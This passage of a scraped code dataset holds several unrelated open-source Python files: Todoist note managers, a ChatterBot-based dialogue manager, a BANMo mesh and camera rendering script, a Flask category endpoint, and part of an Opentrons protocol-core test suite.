i[\"mag\"]),\n frozenset([\"y\", \"angle\", \"mag\"]): (lambda i: (i[\"y\"] / math.sin(math.radians(i[\"angle\"]))) - i[\"mag\"])}\n\n self.finish_init(**kwargs)\"\"\")","repo_name":"deltaqyto/intelligent_calculator_v2","sub_path":"baseitem.py","file_name":"baseitem.py","file_ext":"py","file_size_in_byte":10224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"29928919611","text":"# -*- coding: utf-8 -*-\nfrom .. import models\nfrom .generic import AllMixin, GetByIdMixin, Manager, SyncMixin\n\n\nclass GenericNotesManager(Manager, AllMixin, GetByIdMixin, SyncMixin):\n\n object_type = \"note\"\n\n def update(self, note_id, **kwargs):\n \"\"\"\n Updates an note remotely.\n \"\"\"\n args = {\"id\": note_id}\n args.update(kwargs)\n cmd = {\n \"type\": \"note_update\",\n \"uuid\": self.api.generate_uuid(),\n \"args\": args,\n }\n self.queue.append(cmd)\n\n def delete(self, note_id):\n \"\"\"\n Deletes an note remotely.\n \"\"\"\n cmd = {\n \"type\": \"note_delete\",\n \"uuid\": self.api.generate_uuid(),\n \"args\": {\"id\": note_id},\n }\n self.queue.append(cmd)\n\n\nclass NotesManager(GenericNotesManager):\n\n state_name = \"notes\"\n\n def add(self, item_id, content, **kwargs):\n \"\"\"\n Creates a local item note object.\n \"\"\"\n obj = models.Note({\"item_id\": item_id, \"content\": content}, self.api)\n obj.temp_id = obj[\"id\"] = self.api.generate_uuid()\n obj.data.update(kwargs)\n self.state[self.state_name].append(obj)\n cmd = {\n \"type\": \"note_add\",\n \"temp_id\": obj.temp_id,\n \"uuid\": self.api.generate_uuid(),\n \"args\": {key: obj.data[key] for key in obj.data if key != \"id\"},\n }\n self.queue.append(cmd)\n return obj\n\n def get(self, note_id):\n \"\"\"\n Gets an existing note.\n \"\"\"\n params = {\"token\": self.token, \"note_id\": note_id}\n obj = self.api._get(\"notes/get\", params=params)\n if obj and \"error\" in obj:\n return None\n data = {\"notes\": []}\n if obj.get(\"note\"):\n data[\"notes\"].append(obj.get(\"note\"))\n self.api._update_state(data)\n return obj\n\n\nclass ProjectNotesManager(GenericNotesManager):\n\n state_name = \"project_notes\"\n\n def add(self, project_id, content, **kwargs):\n \"\"\"\n Creates a local project note object.\n \"\"\"\n obj = models.ProjectNote(\n {\"project_id\": project_id, \"content\": content}, self.api\n )\n obj.temp_id = obj[\"id\"] = self.api.generate_uuid()\n obj.data.update(kwargs)\n self.state[self.state_name].append(obj)\n cmd = {\n \"type\": \"note_add\",\n \"temp_id\": obj.temp_id,\n \"uuid\": self.api.generate_uuid(),\n \"args\": {key: obj.data[key] for key in obj.data if key != \"id\"},\n }\n self.queue.append(cmd)\n return obj\n\n def get(self, note_id):\n \"\"\"\n Gets an existing project note.\n \"\"\"\n params = {\"token\": self.token, \"note_id\": note_id}\n obj = self.api._get(\"notes/get\", params=params)\n if obj and \"error\" in obj:\n return None\n data = {\"project_notes\": []}\n if obj.get(\"note\"):\n data[\"project_notes\"].append(obj.get(\"note\"))\n self.api._update_state(data)\n return obj\n","repo_name":"Doist/todoist-python","sub_path":"todoist/managers/notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":546,"dataset":"github-code","pt":"45"} +{"seq_id":"10586116845","text":"import os\nfrom sklearn.metrics.pairwise import pairwise_distances_argmin, cosine_similarity\n\nfrom chatterbot import ChatBot\nfrom chatterbot.trainers import 
ChatterBotCorpusTrainer, ListTrainer\nfrom chatterbot.response_selection import get_random_response\nfrom chatterbot.comparisons import levenshtein_distance\n\nfrom utils import *\n\n# set to any value to limit the number of threads loaded per programming language\n# (to save memory)\nMAX_TRDS_TO_LOAD = None #150000\n\nclass ThreadRanker(object):\n def __init__(self, paths):\n self.word_embeddings, self.embeddings_dim = load_embeddings(paths['WORD_EMBEDDINGS'])\n self.thread_embeddings_folder = paths['THREAD_EMBEDDINGS_FOLDER']\n\n def __load_embeddings_by_tag(self, tag_name):\n embeddings_path = os.path.join(self.thread_embeddings_folder, tag_name + \".pkl\")\n thread_ids, thread_embeddings = unpickle_file(embeddings_path)\n return thread_ids, thread_embeddings\n\n def get_best_thread(self, question, tag_name):\n \"\"\" Returns id of the most similar thread for the question.\n The search is performed across the threads with a given tag.\n \"\"\"\n thread_ids, thread_embeddings = self.__load_embeddings_by_tag(tag_name)\n \n if MAX_TRDS_TO_LOAD is not None: # sample a predefined number of tags\n indices = range(0, thread_ids.shape[0])\n random_indices_choice = np.random.choice(indices, size=min(len(indices), MAX_TRDS_TO_LOAD), \n replace=False)\n thread_ids = thread_ids[random_indices_choice,]\n thread_embeddings = thread_embeddings[random_indices_choice,]\n\n question_vec = question_to_vec(question, self.word_embeddings, self.embeddings_dim)\n \n min_dist = pairwise_distances_argmin(question_vec.reshape(1, -1), thread_embeddings, axis=1, metric='cosine')\n \n best_thread = min_dist[0]\n \n return thread_ids[best_thread]\n\n\nclass DialogueManager(object):\n def __init__(self, paths):\n print(\"Loading resources...\")\n \n self.intent_recognizer = unpickle_file(paths['INTENT_RECOGNIZER'])\n self.tfidf_vectorizer = unpickle_file(paths['TFIDF_VECTORIZER'])\n \n self.ANSWER_TEMPLATE = \"I think its about {:s}.\\n\" + \\\n \"For this problem this thread might help you: https://stackoverflow.com/questions/{:d} \"\n\n # Goal-oriented part:\n self.tag_classifier = unpickle_file(paths['TAG_CLASSIFIER'])\n self.thread_ranker = ThreadRanker(paths)\n \n # Bot part:\n self.create_chitchat_bot(paths['CHATTERBOT_LISTTRAINDATA'])\n \n\n def create_chitchat_bot(self, list_train_data_path):\n \"\"\"Initializes self.chitchat_bot with some conversational model.\"\"\"\n\n \n self.bot = ChatBot('My ChatBot', logic_adapters=[ \n {\"import_path\": \"chatterbot.logic.BestMatch\",\n 'maximum_similarity_threshold': 0.80,\n \"statement_comparison_function\": levenshtein_distance }\n ], response_selection_method=get_random_response)\n \n trainer = ChatterBotCorpusTrainer(self.bot)\n\n trainer.train( 'chatterbot.corpus.english.greetings',\n 'chatterbot.corpus.english.conversations',\n 'chatterbot.corpus.english.emotion',\n 'chatterbot.corpus.english.ai',\n 'chatterbot.corpus.english.gossip',\n 'chatterbot.corpus.english.humor',\n 'chatterbot.corpus.english.psychology',\n 'chatterbot.corpus.english.science',\n 'chatterbot.corpus.english.trivia',\n 'chatterbot.corpus.english.botprofile')\n \n # Train also on the extra conversations we generated \n data = open(list_train_data_path, encoding='utf-8').read()\n conversations = data.strip().split('\\n')\n trainer2 = ListTrainer(self.bot)\n trainer2.train(conversations)\n \n \n def generate_answer(self, question):\n \"\"\"Combines stackoverflow and chitchat parts using intent recognition.\"\"\"\n \n # Intent recognition\n prepared_question = text_prepare(question)\n features = 
self.tfidf_vectorizer.transform([prepared_question])\n intent = self.intent_recognizer.predict(features)[0]\n \n # Chit-chat part: \n if intent == 'dialogue': \n # Pass question to chitchat_bot to generate a response. \n response = self.bot.get_response(question)\n response_text = response.text\n return response_text\n \n # Goal-oriented part:\n else: \n # Pass features to tag_classifier to get predictions.\n tag = self.tag_classifier.predict(features)[0]\n \n # Pass prepared_question to thread_ranker to get predictions.\n thread_id = self.thread_ranker.get_best_thread(prepared_question, tag)\n \n return self.ANSWER_TEMPLATE.format(tag, thread_id)\n\n","repo_name":"agnesvanbelle/nlpc","sub_path":"project/dialogue_manager.py","file_name":"dialogue_manager.py","file_ext":"py","file_size_in_byte":5295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"71136018375","text":"import sys, os\nimport pdb\nsys.path.append(os.path.dirname(os.path.dirname(sys.path[0])))\nos.environ[\"PYOPENGL_PLATFORM\"] = \"egl\" #opengl seems to only work with TPU\ncurr_dir = os.path.abspath(os.getcwd())\nsys.path.insert(0,curr_dir)\n\nimport subprocess\nimport imageio\nimport glob\nfrom utils.io import save_vid\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport cv2\nimport argparse\nimport trimesh\nfrom nnutils.geom_utils import obj_to_cam, pinhole_cam, obj2cam_np\nimport pyrender\nfrom pyrender import IntrinsicsCamera,Mesh, Node, Scene,OffscreenRenderer\nimport configparser\nimport matplotlib\ncmap = matplotlib.cm.get_cmap('cool')\n\nfrom utils.io import config_to_dataloader, draw_cams\n\n\nparser = argparse.ArgumentParser(description='script to render cameras over epochs')\nparser.add_argument('--testdir', default='',\n help='path to test dir')\nparser.add_argument('--cap_frame', default=-1,type=int,\n help='number of frames to cap')\nparser.add_argument('--first_idx', default=0,type=int,\n help='first frame index to vis')\nparser.add_argument('--last_idx', default=-1,type=int,\n help='last frame index to vis')\nparser.add_argument('--mesh_only', dest='mesh_only',action='store_true',\n help='whether to only render rest mesh')\nargs = parser.parse_args()\n \nimg_size = 1024\n\ndef main():\n # read all the data\n logname = args.testdir.split('/')[-2]\n varlist = [i for i in glob.glob('%s/vars_*.npy'%args.testdir) \\\n if 'latest.npy' not in i]\n varlist = sorted(varlist, \n key=lambda x:int(x.split('/')[-1].split('vars_')[-1].split('.npy')[0]))\n \n # get first index that is used for optimization\n var = np.load(varlist[-1],allow_pickle=True)[()]\n var['rtk'] = var['rtk'][args.first_idx:args.last_idx] \n first_valid_idx = np.linalg.norm(var['rtk'][:,:3,3], 2,-1)>0\n first_valid_idx = np.argmax(first_valid_idx)\n #varlist = varlist[1:]\n if args.cap_frame>-1:\n varlist = varlist[:args.cap_frame]\n size = len(varlist)\n\n mesh_cams = []\n mesh_objs = []\n for var_path in varlist:\n # construct camera mesh\n var = np.load(var_path,allow_pickle=True)[()]\n var['rtk'] = var['rtk'][args.first_idx:args.last_idx] \n mesh_cams.append(draw_cams(var['rtk'][first_valid_idx:]))\n mesh_objs.append(var['mesh_rest'])\n\n frames = []\n # process cameras\n for i in range(size):\n print(i)\n refcam = var['rtk'][first_valid_idx].copy()\n ## median camera trans\n #mtrans = np.median(np.linalg.norm(var['rtk'][first_valid_idx:,:3,3],2,-1)) \n # max camera trans\n mtrans = np.max(np.linalg.norm(var['rtk'][first_valid_idx:,:3,3],2,-1)) \n refcam[:2,3] = 0 # 
trans xy\n refcam[2,3] = 4*mtrans # depth\n refcam[3,:2] = 4*img_size/2 # fl\n refcam[3,2] = img_size/2\n refcam[3,3] = img_size/2\n vp_rmat = refcam[:3,:3]\n if args.mesh_only: refcam[3,:2] *= 2 # make it appear larger\n else:\n vp_rmat = cv2.Rodrigues(np.asarray([np.pi/2,0,0]))[0].dot(vp_rmat) # bev\n refcam[:3,:3] = vp_rmat\n\n # load vertices\n refmesh = mesh_cams[i]\n refface = torch.Tensor(refmesh.faces[None]).cuda()\n verts = torch.Tensor(refmesh.vertices[None]).cuda()\n\n # render\n Rmat = torch.Tensor(refcam[None,:3,:3]).cuda()\n Tmat = torch.Tensor(refcam[None,:3,3]).cuda()\n ppoint =refcam[3,2:]\n focal = refcam[3,:2]\n\n verts = obj_to_cam(verts, Rmat, Tmat)\n\n\n r = OffscreenRenderer(img_size, img_size)\n colors = refmesh.visual.vertex_colors\n \n scene = Scene(ambient_light=0.4*np.asarray([1.,1.,1.,1.]))\n direc_l = pyrender.DirectionalLight(color=np.ones(3), intensity=6.0)\n colors= np.concatenate([0.6*colors[:,:3].astype(np.uint8), colors[:,3:]],-1) # avoid overexposure\n \n smooth=True\n mesh = trimesh.Trimesh(vertices=np.asarray(verts[0,:,:3].cpu()), faces=np.asarray(refface[0].cpu()),vertex_colors=colors)\n meshr = Mesh.from_trimesh(mesh,smooth=smooth)\n meshr._primitives[0].material.RoughnessFactor=.5\n if not args.mesh_only:\n scene.add_node( Node(mesh=meshr ))\n\n mesh_obj = mesh_objs[i]\n if args.mesh_only:\n # assign gray color\n mesh_obj.visual.vertex_colors[...,:3] = 64\n if len(mesh_obj.vertices)>0:\n mesh_obj.vertices = obj2cam_np(mesh_obj.vertices, Rmat, Tmat)\n mesh_obj=Mesh.from_trimesh(mesh_obj,smooth=smooth)\n mesh_obj._primitives[0].material.RoughnessFactor=1.\n scene.add_node( Node(mesh=mesh_obj))\n\n cam = IntrinsicsCamera(\n focal[0],\n focal[0],\n ppoint[0],\n ppoint[1],\n znear=1e-3,zfar=1000)\n cam_pose = -np.eye(4); cam_pose[0,0]=1; cam_pose[-1,-1]=1\n cam_node = scene.add(cam, pose=cam_pose)\n light_pose =np.asarray([[1,0,0,0],[0,0,-1,0],[0,1,0,0],[0,0,0,1]],dtype=float)\n light_pose[:3,:3] = cv2.Rodrigues(np.asarray([np.pi,0,0]))[0]\n direc_l_node = scene.add(direc_l, pose=light_pose)\n color, depth = r.render(scene,flags=pyrender.RenderFlags.SHADOWS_DIRECTIONAL | pyrender.RenderFlags.SKIP_CULL_FACES)\n r.delete()\n \n # save image\n color = color.astype(np.uint8)\n color = cv2.putText(color, 'epoch: %02d'%(i), (30,50), \n cv2.FONT_HERSHEY_SIMPLEX,2, (256,0,0), 2)\n imoutpath = '%s/mesh-cam-%02d.png'%(args.testdir,i)\n cv2.imwrite(imoutpath,color[:,:,::-1] )\n frames.append(color)\n\n save_vid('%s/mesh-cam'%args.testdir, frames, suffix='.gif') \n save_vid('%s/mesh-cam'%args.testdir, frames, suffix='.mp4',upsample_frame=-1)\nif __name__ == '__main__':\n main()\n","repo_name":"facebookresearch/banmo","sub_path":"scripts/visualize/render_root.py","file_name":"render_root.py","file_ext":"py","file_size_in_byte":5921,"program_lang":"python","lang":"en","doc_type":"code","stars":490,"dataset":"github-code","pt":"45"} +{"seq_id":"29767678325","text":"from ..models import Category as CategoryModel\nfrom flask_restful import Resource, request, reqparse\nfrom flask_cors import cross_origin\n\n\nclass Category(Resource):\n parser = reqparse.RequestParser()\n parser.add_argument('title')\n\n @cross_origin()\n def post(self):\n request_data = self.parser.parse_args()\n title = request_data.get('title')\n if not CategoryModel.objects(title=title):\n category = CategoryModel(title=title)\n category.save()\n return {'message': title + ' category created'}\n return {'message': title + \" category already exists\"}\n\n @cross_origin()\n def get(self):\n categories 
= CategoryModel.objects.all()\n categories_json = [category.json() for category in categories]\n return {'categories': categories_json}\n","repo_name":"menooa25/maktab_53_project_1","sub_path":"resources/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"23536191185","text":"\"\"\"Test for the ProtocolEngine-based protocol API core.\"\"\"\nimport inspect\nfrom typing import Optional, Type, cast, Tuple\n\nimport pytest\nfrom decoy import Decoy\n\nfrom opentrons_shared_data.deck.dev_types import DeckDefinitionV3\nfrom opentrons_shared_data.pipette.dev_types import PipetteNameType\nfrom opentrons_shared_data.labware.dev_types import (\n LabwareDefinition as LabwareDefDict,\n LabwareUri,\n)\nfrom opentrons_shared_data.labware.labware_definition import LabwareDefinition\n\nfrom opentrons.types import DeckSlotName, Mount, MountType, Point\nfrom opentrons.hardware_control import SyncHardwareAPI, SynchronousAdapter\nfrom opentrons.hardware_control.modules import AbstractModule\nfrom opentrons.hardware_control.modules.types import (\n ModuleModel,\n TemperatureModuleModel,\n MagneticModuleModel,\n ThermocyclerModuleModel,\n HeaterShakerModuleModel,\n)\nfrom opentrons.protocol_engine import (\n ModuleModel as EngineModuleModel,\n DeckSlotLocation,\n ModuleLocation,\n ModuleDefinition,\n LabwareMovementStrategy,\n LoadedLabware,\n LoadedModule,\n commands,\n LabwareOffsetVector,\n)\nfrom opentrons.protocol_engine.clients import SyncClient as EngineClient\nfrom opentrons.protocol_engine.types import Liquid as PE_Liquid, HexColor, FlowRates\nfrom opentrons.protocol_engine.errors import LabwareNotLoadedOnModuleError\nfrom opentrons.protocol_engine.state.labware import (\n LabwareLoadParams as EngineLabwareLoadParams,\n)\n\nfrom opentrons.protocol_api.core.labware import LabwareLoadParams\nfrom opentrons.protocol_api.core.engine import (\n deck_conflict,\n ProtocolCore,\n InstrumentCore,\n LabwareCore,\n ModuleCore,\n load_labware_params,\n)\nfrom opentrons.protocol_api._liquid import Liquid\nfrom opentrons.protocol_api.core.engine.exceptions import InvalidModuleLocationError\nfrom opentrons.protocol_api.core.engine.module_core import (\n TemperatureModuleCore,\n MagneticModuleCore,\n ThermocyclerModuleCore,\n HeaterShakerModuleCore,\n)\nfrom opentrons.protocol_api import MAX_SUPPORTED_VERSION\n\nfrom opentrons.protocols.api_support.types import APIVersion\n\n\n@pytest.fixture(autouse=True)\ndef patch_mock_load_labware_params(\n decoy: Decoy, monkeypatch: pytest.MonkeyPatch\n) -> None:\n \"\"\"Mock out point_calculations.py functions.\"\"\"\n for name, func in inspect.getmembers(load_labware_params, inspect.isfunction):\n monkeypatch.setattr(load_labware_params, name, decoy.mock(func=func))\n\n\n@pytest.fixture(autouse=True)\ndef patch_mock_deck_conflict_check(\n decoy: Decoy, monkeypatch: pytest.MonkeyPatch\n) -> None:\n \"\"\"Replace deck_conflict.check() with a mock.\"\"\"\n mock = decoy.mock(func=deck_conflict.check)\n monkeypatch.setattr(deck_conflict, \"check\", mock)\n\n\n@pytest.fixture\ndef mock_engine_client(decoy: Decoy) -> EngineClient:\n \"\"\"Get a mock ProtocolEngine synchronous client.\"\"\"\n return decoy.mock(cls=EngineClient)\n\n\n@pytest.fixture\ndef api_version() -> APIVersion:\n \"\"\"Get an API version to apply to the interface.\"\"\"\n return MAX_SUPPORTED_VERSION\n\n\n@pytest.fixture\ndef mock_sync_module_hardware(decoy: Decoy) -> 
SynchronousAdapter[AbstractModule]:\n \"\"\"Get a mock synchronous module hardware.\"\"\"\n return decoy.mock(name=\"SynchronousAdapter[AbstractModule]\") # type: ignore[no-any-return]\n\n\n@pytest.fixture\ndef mock_sync_hardware_api(decoy: Decoy) -> SyncHardwareAPI:\n \"\"\"Get a mock hardware API.\"\"\"\n return decoy.mock(cls=SyncHardwareAPI)\n\n\n@pytest.fixture\ndef subject(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n api_version: APIVersion,\n mock_sync_hardware_api: SyncHardwareAPI,\n) -> ProtocolCore:\n \"\"\"Get a ProtocolCore test subject with its dependencies mocked out.\"\"\"\n decoy.when(mock_engine_client.state.labware.get_fixed_trash_id()).then_return(\n \"fixed-trash-123\"\n )\n decoy.when(\n mock_engine_client.state.labware.get_definition(\"fixed-trash-123\")\n ).then_return(\n LabwareDefinition.construct(ordering=[[\"A1\"]]) # type: ignore[call-arg]\n )\n\n return ProtocolCore(\n engine_client=mock_engine_client,\n api_version=api_version,\n sync_hardware=mock_sync_hardware_api,\n )\n\n\n@pytest.mark.parametrize(\"api_version\", [APIVersion(2, 3)])\ndef test_api_version(\n decoy: Decoy, subject: ProtocolCore, api_version: APIVersion\n) -> None:\n \"\"\"Should return the protocol version.\"\"\"\n assert subject.api_version == api_version\n\n\ndef test_fixed_trash(subject: ProtocolCore) -> None:\n \"\"\"It should have a single labware core for the fixed trash.\"\"\"\n result = subject.fixed_trash\n\n assert isinstance(result, LabwareCore)\n assert result.labware_id == \"fixed-trash-123\"\n assert subject.get_labware_cores() == [result]\n\n # verify it's the same core every time\n assert subject.fixed_trash is result\n\n\ndef test_get_slot_item_empty(\n decoy: Decoy, mock_engine_client: EngineClient, subject: ProtocolCore\n) -> None:\n \"\"\"It should return None for an empty deck slot.\"\"\"\n decoy.when(\n mock_engine_client.state.geometry.get_slot_item(\n slot_name=DeckSlotName.SLOT_1,\n allowed_labware_ids={\"fixed-trash-123\"},\n allowed_module_ids=set(),\n )\n ).then_return(None)\n\n assert subject.get_slot_item(DeckSlotName.SLOT_1) is None\n\n\ndef test_load_instrument(\n decoy: Decoy,\n mock_sync_hardware_api: SyncHardwareAPI,\n mock_engine_client: EngineClient,\n subject: ProtocolCore,\n) -> None:\n \"\"\"It should issue a LoadPipette command.\"\"\"\n decoy.when(\n mock_engine_client.load_pipette(\n pipette_name=PipetteNameType.P300_SINGLE, mount=MountType.LEFT\n )\n ).then_return(commands.LoadPipetteResult(pipetteId=\"cool-pipette\"))\n\n decoy.when(\n mock_engine_client.state.pipettes.get_flow_rates(\"cool-pipette\")\n ).then_return(\n FlowRates(\n default_aspirate={\"1.1\": 22},\n default_dispense={\"3.3\": 44},\n default_blow_out={\"5.5\": 66},\n ),\n )\n\n result = subject.load_instrument(\n instrument_name=PipetteNameType.P300_SINGLE, mount=Mount.LEFT\n )\n\n assert isinstance(result, InstrumentCore)\n assert result.pipette_id == \"cool-pipette\"\n\n\ndef test_load_labware(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n subject: ProtocolCore,\n) -> None:\n \"\"\"It should issue a LoadLabware command.\"\"\"\n decoy.when(\n mock_engine_client.state.labware.find_custom_labware_load_params()\n ).then_return([EngineLabwareLoadParams(\"hello\", \"world\", 654)])\n\n decoy.when(\n load_labware_params.resolve(\n \"some_labware\",\n \"a_namespace\",\n 456,\n [EngineLabwareLoadParams(\"hello\", \"world\", 654)],\n )\n ).then_return((\"some_namespace\", 9001))\n\n decoy.when(\n mock_engine_client.load_labware(\n 
location=DeckSlotLocation(slotName=DeckSlotName.SLOT_5),\n load_name=\"some_labware\",\n display_name=\"some_display_name\",\n namespace=\"some_namespace\",\n version=9001,\n )\n ).then_return(\n commands.LoadLabwareResult(\n labwareId=\"abc123\",\n definition=LabwareDefinition.construct(), # type: ignore[call-arg]\n offsetId=None,\n )\n )\n\n decoy.when(mock_engine_client.state.labware.get_definition(\"abc123\")).then_return(\n LabwareDefinition.construct(ordering=[]) # type: ignore[call-arg]\n )\n\n result = subject.load_labware(\n load_name=\"some_labware\",\n location=DeckSlotName.SLOT_5,\n label=\"some_display_name\", # maps to optional display name\n namespace=\"a_namespace\",\n version=456,\n )\n\n assert isinstance(result, LabwareCore)\n assert result.labware_id == \"abc123\"\n assert subject.get_labware_cores() == [subject.fixed_trash, result]\n\n decoy.verify(\n deck_conflict.check(\n engine_state=mock_engine_client.state,\n existing_labware_ids=[\"fixed-trash-123\"],\n existing_module_ids=[],\n new_labware_id=\"abc123\",\n )\n )\n\n decoy.when(\n mock_engine_client.state.geometry.get_slot_item(\n slot_name=DeckSlotName.SLOT_5,\n allowed_labware_ids={\"fixed-trash-123\", \"abc123\"},\n allowed_module_ids=set(),\n )\n ).then_return(\n LoadedLabware.construct(id=\"abc123\") # type: ignore[call-arg]\n )\n\n assert subject.get_slot_item(DeckSlotName.SLOT_5) is result\n\n\n@pytest.mark.parametrize(\n argnames=[\"use_gripper\", \"expected_strategy\"],\n argvalues=[\n (True, LabwareMovementStrategy.USING_GRIPPER),\n (False, LabwareMovementStrategy.MANUAL_MOVE_WITH_PAUSE),\n ],\n)\n@pytest.mark.parametrize(\n argnames=[\n \"use_pick_up_location_lpc_offset\",\n \"use_drop_location_lpc_offset\",\n \"pick_up_offset\",\n \"drop_offset\",\n ],\n argvalues=[\n (False, False, None, None),\n (True, False, None, None),\n (False, True, None, (4, 5, 6)),\n (True, True, (4, 5, 6), (4, 5, 6)),\n ],\n)\ndef test_move_labware(\n decoy: Decoy,\n subject: ProtocolCore,\n mock_engine_client: EngineClient,\n expected_strategy: LabwareMovementStrategy,\n use_gripper: bool,\n use_pick_up_location_lpc_offset: bool,\n use_drop_location_lpc_offset: bool,\n pick_up_offset: Optional[Tuple[float, float, float]],\n drop_offset: Optional[Tuple[float, float, float]],\n) -> None:\n \"\"\"It should issue a move labware command to the engine.\"\"\"\n decoy.when(\n mock_engine_client.state.labware.get_definition(\"labware-id\")\n ).then_return(\n LabwareDefinition.construct(ordering=[]) # type: ignore[call-arg]\n )\n labware = LabwareCore(labware_id=\"labware-id\", engine_client=mock_engine_client)\n subject.move_labware(\n labware_core=labware,\n new_location=DeckSlotName.SLOT_5,\n use_gripper=use_gripper,\n use_pick_up_location_lpc_offset=use_pick_up_location_lpc_offset,\n use_drop_location_lpc_offset=use_drop_location_lpc_offset,\n pick_up_offset=pick_up_offset,\n drop_offset=drop_offset,\n )\n decoy.verify(\n mock_engine_client.move_labware(\n labware_id=\"labware-id\",\n new_location=DeckSlotLocation(slotName=DeckSlotName.SLOT_5),\n strategy=expected_strategy,\n use_pick_up_location_lpc_offset=use_pick_up_location_lpc_offset,\n use_drop_location_lpc_offset=use_drop_location_lpc_offset,\n pick_up_offset=LabwareOffsetVector(x=4, y=5, z=6)\n if pick_up_offset\n else None,\n drop_offset=LabwareOffsetVector(x=4, y=5, z=6) if drop_offset else None,\n )\n )\n\n\n@pytest.mark.parametrize(\"api_version\", [APIVersion(2, 3)])\ndef test_load_labware_on_module(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n 
mock_sync_module_hardware: SynchronousAdapter[AbstractModule],\n subject: ProtocolCore,\n api_version: APIVersion,\n) -> None:\n \"\"\"It should issue a LoadLabware command.\"\"\"\n decoy.when(\n mock_engine_client.state.labware.find_custom_labware_load_params()\n ).then_return([EngineLabwareLoadParams(\"hello\", \"world\", 654)])\n\n decoy.when(\n load_labware_params.resolve(\n \"some_labware\",\n \"a_namespace\",\n 456,\n [EngineLabwareLoadParams(\"hello\", \"world\", 654)],\n )\n ).then_return((\"some_namespace\", 9001))\n\n decoy.when(\n mock_engine_client.load_labware(\n location=ModuleLocation(moduleId=\"module-id\"),\n load_name=\"some_labware\",\n display_name=\"some_display_name\",\n namespace=\"some_namespace\",\n version=9001,\n )\n ).then_return(\n commands.LoadLabwareResult(\n labwareId=\"abc123\",\n definition=LabwareDefinition.construct(), # type: ignore[call-arg]\n offsetId=None,\n )\n )\n\n decoy.when(mock_engine_client.state.labware.get_definition(\"abc123\")).then_return(\n LabwareDefinition.construct(ordering=[]) # type: ignore[call-arg]\n )\n\n module_core = ModuleCore(\n module_id=\"module-id\",\n engine_client=mock_engine_client,\n api_version=api_version,\n sync_module_hardware=mock_sync_module_hardware,\n )\n\n result = subject.load_labware(\n load_name=\"some_labware\",\n location=module_core,\n label=\"some_display_name\", # maps to optional display name\n namespace=\"a_namespace\",\n version=456,\n )\n\n assert isinstance(result, LabwareCore)\n assert result.labware_id == \"abc123\"\n\n decoy.verify(\n deck_conflict.check(\n engine_state=mock_engine_client.state,\n existing_labware_ids=[\"fixed-trash-123\"],\n existing_module_ids=[],\n new_labware_id=\"abc123\",\n )\n )\n\n decoy.when(\n mock_engine_client.state.labware.get_id_by_module(\"module-id\")\n ).then_return(\"abc123\")\n\n assert subject.get_labware_on_module(module_core) is result\n\n\ndef test_add_labware_definition(\n decoy: Decoy,\n minimal_labware_def: LabwareDefDict,\n mock_engine_client: EngineClient,\n subject: ProtocolCore,\n) -> None:\n \"\"\"It should add a labware definition to the engine.\"\"\"\n decoy.when(\n mock_engine_client.add_labware_definition(\n definition=LabwareDefinition.parse_obj(minimal_labware_def)\n )\n ).then_return(LabwareUri(\"hello/world/123\"))\n\n result = subject.add_labware_definition(minimal_labware_def)\n\n assert result == LabwareLoadParams(\"hello\", \"world\", 123)\n\n\n# TODO(mc, 2022-10-25): move to module core factory function\n@pytest.mark.parametrize(\n (\"requested_model\", \"engine_model\", \"expected_core_cls\"),\n [\n (\n TemperatureModuleModel.TEMPERATURE_V1,\n EngineModuleModel.TEMPERATURE_MODULE_V1,\n TemperatureModuleCore,\n ),\n (\n TemperatureModuleModel.TEMPERATURE_V2,\n EngineModuleModel.TEMPERATURE_MODULE_V2,\n TemperatureModuleCore,\n ),\n (\n MagneticModuleModel.MAGNETIC_V1,\n EngineModuleModel.MAGNETIC_MODULE_V1,\n MagneticModuleCore,\n ),\n (\n MagneticModuleModel.MAGNETIC_V2,\n EngineModuleModel.MAGNETIC_MODULE_V2,\n MagneticModuleCore,\n ),\n (\n ThermocyclerModuleModel.THERMOCYCLER_V1,\n EngineModuleModel.THERMOCYCLER_MODULE_V1,\n ThermocyclerModuleCore,\n ),\n (\n ThermocyclerModuleModel.THERMOCYCLER_V2,\n EngineModuleModel.THERMOCYCLER_MODULE_V2,\n ThermocyclerModuleCore,\n ),\n (\n HeaterShakerModuleModel.HEATER_SHAKER_V1,\n EngineModuleModel.HEATER_SHAKER_MODULE_V1,\n HeaterShakerModuleCore,\n ),\n ],\n)\ndef test_load_module(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n mock_sync_hardware_api: SyncHardwareAPI,\n 
requested_model: ModuleModel,\n engine_model: EngineModuleModel,\n expected_core_cls: Type[ModuleCore],\n subject: ProtocolCore,\n) -> None:\n \"\"\"It should issue a load module engine command.\"\"\"\n definition = ModuleDefinition.construct() # type: ignore[call-arg]\n\n mock_hw_mod_1 = decoy.mock(cls=AbstractModule)\n mock_hw_mod_2 = decoy.mock(cls=AbstractModule)\n\n decoy.when(mock_hw_mod_1.device_info).then_return({\"serial\": \"abc123\"})\n decoy.when(mock_hw_mod_2.device_info).then_return({\"serial\": \"xyz789\"})\n decoy.when(mock_sync_hardware_api.attached_modules).then_return(\n [mock_hw_mod_1, mock_hw_mod_2]\n )\n\n decoy.when(\n mock_engine_client.load_module(\n model=engine_model,\n location=DeckSlotLocation(slotName=DeckSlotName.SLOT_1),\n )\n ).then_return(\n commands.LoadModuleResult(\n moduleId=\"abc123\",\n definition=definition,\n model=engine_model,\n serialNumber=\"xyz789\",\n )\n )\n\n result = subject.load_module(\n model=requested_model,\n deck_slot=DeckSlotName.SLOT_1,\n configuration=None,\n )\n\n assert isinstance(result, expected_core_cls)\n assert result.module_id == \"abc123\"\n assert subject.get_module_cores() == [result]\n\n decoy.verify(\n deck_conflict.check(\n engine_state=mock_engine_client.state,\n existing_labware_ids=[\"fixed-trash-123\"],\n existing_module_ids=[],\n new_module_id=\"abc123\",\n )\n )\n\n decoy.when(\n mock_engine_client.state.geometry.get_slot_item(\n slot_name=DeckSlotName.SLOT_1,\n allowed_labware_ids={\"fixed-trash-123\"},\n allowed_module_ids={\"abc123\"},\n )\n 